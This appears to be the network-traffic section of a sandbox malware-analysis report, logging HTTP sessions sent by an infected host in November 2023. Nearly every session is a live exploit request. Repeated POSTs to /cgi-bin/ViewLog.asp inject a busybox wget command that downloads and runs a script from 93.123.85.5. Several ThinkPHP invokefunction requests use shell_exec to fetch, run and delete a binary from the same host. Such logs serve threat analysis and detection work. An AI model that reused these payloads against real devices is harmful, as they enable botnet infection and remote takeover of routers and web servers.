                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              459192.168.2.233711085.215.63.1018080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.296046972 CET9330OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.600322962 CET9342INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:19:15 GMT
                                                              Connection: Close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              46192.168.2.233756295.31.222.2168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.323645115 CET2075OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:16.651998997 CET2102INHTTP/1.1 403 Forbidden
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:18:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 151
                                                              Connection: keep-alive
                                                              X-Detail: 0x1210, insufficient security level
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              460192.168.2.235882285.31.63.2198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.305227995 CET9331OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              461192.168.2.234907462.29.38.1288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.358685017 CET9337OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              462192.168.2.234909231.136.73.948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.369807959 CET9338OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:16.363516092 CET9460OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:18.347251892 CET9695OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.442814112 CET10181OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.377945900 CET11136OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:46.247570038 CET13104OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.523231030 CET17305OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              463192.168.2.234813294.121.148.1688080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.386562109 CET9339OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              464192.168.2.235891294.122.223.518080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.387077093 CET9339OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              465192.168.2.234575295.86.103.1568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.479087114 CET9340OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              466192.168.2.2340356112.78.203.14180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:16.068593025 CET9445OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:16.329859018 CET9458INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              467192.168.2.2337820112.218.176.5880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:16.141210079 CET9446OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:16.481010914 CET9461INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Mon, 13 Nov 2023 21:19:15 GMT
                                                              Server: lighttpd/1.4.32
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              468192.168.2.234420685.242.32.418080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:16.335011005 CET9459OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              469192.168.2.234427895.142.172.15880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:16.436614990 CET9460OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:16.732116938 CET9548INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:16 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              47192.168.2.234050631.200.97.2028080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.337507010 CET2076OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              470192.168.2.235279231.136.107.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:16.661325932 CET9464OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:17.643459082 CET9579OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
